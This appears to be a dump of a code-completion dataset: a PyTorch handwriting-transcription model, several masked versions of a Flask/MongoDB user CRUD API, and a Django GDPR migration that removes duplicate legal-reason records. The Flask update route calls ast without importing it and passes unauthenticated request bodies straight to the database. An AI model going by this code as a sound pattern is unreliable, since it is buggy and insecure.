nn.Linear(f*4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f, dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers, num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n # (Text Transcriber) Decoder\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n\n # General\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n \n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f*h, w).permute(0, 2, 1)\n # x = F.relu(self.fc(x))\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n # x = F.relu(self.fc_bar(x))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n # x = self.layer_norm(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x)*math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet[\"<E>\"]}\n s = {self.alphabet[\"<S>\"], self.alphabet[\"<P>\"]}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return (txt if bulk else \"\".join(txt))\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.alphabet[\"<P>\"]).long()\n output_tokens[:, 0] = self.alphabet[\"<S>\"]\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:,-1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n\n# DEBUG\nimport os\nimport torchvision\nimport numpy as np\nfrom torchvision.transforms.functional import resize, pil_to_tensor\nimport PIL\n\ndef load_batch_image(max_img=2):\n # Each batch should have \n return torch.cat([load_image(os.path.join('debug-data', f\"{i}.png\")) for i in range(1, max_img+1)], dim=0).unsqueeze(1)\n\ncharacter_dict = dict()\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\nTXT = [\"A|MOVE|to|stop|Mr.|Gaitskell|from\", \"nominating|any|more|Labour|life|Peers\"]\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\nif __name__ == \"__main__\":\n # load two images\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)",
"step-ids": [
12,
18,
21,
23,
24
]
}
|
[
12,
18,
21,
23,
24
] |
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
message = {'err': {'msg':
'This route is currently not supported. Please refer API documentation.'
}}
resp = jsonify(message)
resp.status_code = 404
return resp
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
message = {'err': {'msg':
'This route is currently not supported. Please refer API documentation.'
}}
resp = jsonify(message)
resp.status_code = 404
return resp
<|reserved_special_token_1|>
"""This module will serve the api request."""
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route("/api/v1/users", methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
# Create new user
try:
body = request.get_json()
except:
# Bad request as request body is not available
return abort(400)
record_id = collection.insert(body)
return jsonify({"message":"Successfully Created the resource."}), 201
except:
# Error while trying to create the resource
return "Error while trying to create the resource", 500
@app.route("/api/v1/users", methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
# Fetch all the record(s)
records_fetched = collection.find()
# Check if the records are found
if records_fetched.count() > 0:
# Prepare the response
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
# No records are found
return jsonify({"message":"No records are found"}), 404
except Exception as e:
print(str(e))
# Error while trying to fetch the resource
return jsonify({"message":"Error while trying to fetch the resource"}), 500
@app.route("/api/v1/users/<user_id>", methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
# Get the value which needs to be updated
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
# Bad request as the request body is not available
# Add message for debugging purpose
return "", 400
# Updating the user
records_updated = collection.update_one({"id": int(user_id)}, body)
# Check if resource is updated
if records_updated.modified_count > 0:
# Prepare the response as resource is updated successfully
return "", 200
else:
# Bad request as the resource is not available to update
# Add message for debugging purpose
return "", 404
except:
# Error while trying to update the resource
# Add message for debugging purpose
return "", 500
@app.route("/api/v1/users/<user_id>", methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
# Delete the user
delete_user = collection.delete_one({"id": int(user_id)})
if delete_user.deleted_count > 0 :
# Prepare the response
return "", 204
else:
# Resource Not found
return "", 404
except:
# Error while trying to delete the resource
# Add message for debugging purpose
return "", 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
# Message to the user
message = {
"err":
{
"msg": "This route is currently not supported. Please refer API documentation."
}
}
# Making the message looks good
resp = jsonify(message)
# Sending OK response
resp.status_code = 404
# Returning the object
return resp
|
flexible
|
{
"blob_id": "0f4bb65b93df997ca1a9b7945ebcec53a2f43822",
"index": 3636,
"step-1": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-4": "<mask token>\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-5": "\"\"\"This module will serve the api request.\"\"\"\n\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected](\"/api/v1/users\", methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n # Create new user\n try:\n body = request.get_json()\n except:\n # Bad request as request body is not available\n return abort(400)\n\n record_id = collection.insert(body)\n return jsonify({\"message\":\"Successfully Created the resource.\"}), 201\n\n except:\n # Error while trying to create the resource\n return \"Error while trying to create the resource\", 500\n\n\[email protected](\"/api/v1/users\", methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n # Fetch all the record(s)\n records_fetched = collection.find()\n\n # Check if the records are found\n if records_fetched.count() > 0:\n # Prepare the response\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n # No records are found\n return jsonify({\"message\":\"No records are found\"}), 404\n except Exception as e:\n print(str(e))\n # Error while trying to fetch the resource\n return jsonify({\"message\":\"Error while trying to fetch the resource\"}), 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n # Delete the user\n delete_user = collection.delete_one({\"id\": int(user_id)})\n\n if delete_user.deleted_count > 0 :\n # Prepare the response\n return \"\", 204\n else:\n # Resource Not found\n return \"\", 404\n except:\n # Error while trying to delete the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
<|reserved_special_token_0|>
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
check_qs = LegalReason.objects.values(u'purpose_slug',
u'source_object_content_type', u'source_object_id').annotate(lr_count
=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'
).distinct()
for legal_reason in tqdm(check_qs.all()):
remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],
legal_reason[u'source_object_content_type'], legal_reason[
u'source_object_id'])
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Count
from tqdm import tqdm
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
check_qs = LegalReason.objects.values(u'purpose_slug',
u'source_object_content_type', u'source_object_id').annotate(lr_count
=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'
).distinct()
for legal_reason in tqdm(check_qs.all()):
remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],
legal_reason[u'source_object_content_type'], legal_reason[
u'source_object_id'])
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
